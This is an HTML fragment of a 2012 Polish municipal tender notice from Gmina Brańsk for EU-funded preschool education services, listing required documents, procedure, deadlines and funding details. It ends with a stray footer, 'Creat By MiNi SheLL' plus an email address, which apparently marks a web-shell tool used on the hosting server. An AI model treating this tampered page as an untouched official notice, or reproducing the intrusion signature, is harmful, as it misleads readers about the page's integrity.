<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>NIE DOTYCZY</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.ug.bransk.wrotapodlasia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Brańsk
ul. Rynek 8
17-120 Brańsk
Pok. nr 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.10.2012 godzina 08:30, miejsce: Urząd Gminy Brańsk
ul. Rynek 8
17-120 Brańsk
Sekretariat (II piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt ,,Edukacja dzieci naszą przyszłością - ośrodki wychowania przedszkolnego w  gminie Brańsk, w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Europejskiego Funduszu Społecznego.
Priorytet IX - Rozwój wykształcenia i kompetencji w regionach.
Działanie 9.1. -Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty.
Poddziałanie 9.1.1. - Zmniejszanie nierówności w stopniu upowszechniana edukacji przedszkolnej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com